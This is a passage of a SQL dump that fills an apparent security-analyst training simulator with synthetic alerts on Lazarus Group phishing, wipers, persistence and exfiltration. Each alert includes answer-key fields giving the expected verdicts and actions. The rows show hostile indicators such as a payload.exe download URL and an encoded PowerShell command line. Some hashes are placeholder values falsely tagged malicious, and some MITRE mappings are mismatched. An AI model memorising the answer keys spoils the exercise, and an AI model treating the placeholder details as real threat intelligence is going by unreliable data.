4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1471, 'Initial Access via Phishing Campaign', 'high', 'Email Security Gateway', 'Hidden Cobra initiates their campaign with a wave of spear-phishing emails, targeting employees within the entertainment sector, aiming to gain a foothold in the network.', 'Social Engineering', 'T1566 - Phishing', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"source_email\":\"malicious_sender@compromised-domain.com\",\"destination_email\":\"employee@entertainmentcorp.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"malicious_url\":\"http://malicious-download.com/payload.exe\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Hidden Cobra activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"malicious_sender@compromised-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with previous phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash known for delivering malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-download.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL hosting known 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-03-15T20:58:14.812Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1472, 'Execution of Destover Wiper', 'high', 'Endpoint Detection and Response (EDR)', 'Once inside the network, Hidden Cobra deploys a modified variant of the Destover wiper, aiming to destroy data and disrupt services within critical infrastructure. This alert was triggered following the execution of the Destover payload on a compromised host.', 'Malware Deployment', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"123456\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"user\":\"compromised_user\",\"process_name\":\"destover.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_action\":\"File execution\",\"host\":\"critical-infra-host\",\"severity\":\"high\",\"event_description\":\"Execution of known wiper malware variant on critical host\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Hidden Cobra operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical infrastructure host\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"User account used during malware execution\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destover.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with Destover 
wiper\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Destover malware variant\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1473, 'Establishing Persistence through Backdoors', 'high', 'Network Traffic Analysis', 'Anomalous traffic indicative of backdoor installation by Lazarus Group was detected. External communication with a known malicious IP and suspicious file transfer suggest an attempt to establish persistent access to compromised systems.', 'Backdoor Installation', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"filename\":\"sysupdate.dll\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"user\":\"compromised_user\",\"action\":\"file_transfer\",\"direction\":\"outbound\",\"alert\":\"Suspicious Backdoor Installation Attempt\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sysupdate.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File used by Lazarus Group for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known backdoor used by Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials 
possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1474, 'Lateral Movement in Financial Systems', 'high', 'Internal Network Logs', 'Hidden Cobra extends its reach, moving laterally across the network, seeking to map out and understand the layout of Turkish financial systems for potential future exploitation.', 'Network Propagation', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"LM-202310151432\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"fin_map_tool.exe\",\"event_type\":\"file_transfer\",\"action\":\"succeeded\",\"protocol\":\"SMB\",\"description\":\"Malicious tool transferred for lateral movement in financial systems\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP targeted by attacker for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Hidden Cobra operations\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with financial system mapping malware linked to Hidden 
Cobra\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"fin_map_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"File used for network mapping in financial systems\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised for lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1475, 'Data Exfiltration and Reconnaissance', 'high', 'Data Loss Prevention (DLP)', 'The final stage of the operation involves exfiltrating sensitive data, including financial transaction details, to support intelligence and financial theft objectives. Detected data exfiltration activity from an internal network to an external IP address associated with known Lazarus Group operations.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.20.30.40\",\"destination_ip\":\"203.0.113.45\",\"filename\":\"financial_transactions_2023.csv\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"j.doe\",\"action\":\"exfiltration_attempt\",\"protocol\":\"HTTPS\",\"bytes_sent\":1048576,\"detection_method\":\"DLP\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"File hash linked to data exfiltration malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP address.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_transactions_2023.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Audit Logs\",\"verdict\":\"malicious\",\"details\":\"Sensitive financial data targeted for 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1476, 'Initial Access Through Spear Phishing', 'high', 'Email Gateway Logs', 'The Lazarus Group initiated an initial access attempt through spear-phishing emails targeting employees in the defense sector. The emails contained job recruitment lures designed to entice the recipient into opening a malicious attachment that deploys the Rising Sun implant.', 'Spear Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:11Z\",\"email_id\":\"c3f8a1b002d45@example.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"sender_email\":\"recruitment@fakejobs.com\",\"recipient_email\":\"jane.doe@defenseco.com\",\"subject\":\"Exciting Job Opportunity in Defense\",\"attachment\":{\"filename\":\"JobOffer.docx\",\"hash\":\"3e5f7e1b7e2b6c8a9e8f7d6b5c3a4f2e\"},\"malicious_indicator\":true}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"recruitment@fakejobs.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e5f7e1b7e2b6c8a9e8f7d6b5c3a4f2e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rising Sun 
implant.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access Through Spear Phishing\",\"date\":\"2026-03-15T20:58:14.860Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1477, 'Execution of Rising Sun Implant', 'high', 'Endpoint Detection and Response (EDR) Logs', 'The Rising Sun implant was executed on a compromised system, providing remote access to the attackers. This is a critical step in the advanced persistent threat operation, likely preparing for data exfiltration or further exploitation.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"evt-20231012-1024\",\"source_ip\":\"45.83.123.123\",\"destination_ip\":\"192.168.1.101\",\"user\":\"compromised_user\",\"process_name\":\"rising_sun.exe\",\"process_hash\":\"3a5f2c7d8c1f4e6d9f8b2e3c4d5f6a7b\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\rising_sun.exe\",\"command_line\":\"rising_sun.exe -silent\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":4321,\"action\":\"Execution\",\"status\":\"Success\"}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.83.123.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"rising_sun.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Executable related to Rising Sun implant\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a5f2c7d8c1f4e6d9f8b2e3c4d5f6a7b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rising Sun 
malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1478, 'Establishing Persistence - Advanced Threat Actor Activity Detected', 'high', 'Windows Event Logs', 'Suspicious persistence mechanism detected potentially linked to Lazarus Group. The attacker has implemented a Windows service to maintain access through system reboots and user logouts.', 'Persistence Mechanism', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"event_id\":7045,\"timestamp\":\"2023-10-15T02:14:07Z\",\"computer_name\":\"compromised_host01\",\"user\":\"NT AUTHORITY\\\\SYSTEM\",\"service_name\":\"UpdateService\",\"service_file_name\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\msupdate.exe\",\"service_type\":\"Own Process\",\"start_type\":\"Auto Start\",\"ip_address\":\"10.0.0.45\",\"external_ip\":\"203.0.113.45\",\"sha256\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\",\"tags\":[\"Lazarus Group\",\"Persistence\",\"APT\"]}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous Lazarus Group activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious software used by Lazarus 
Group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. 
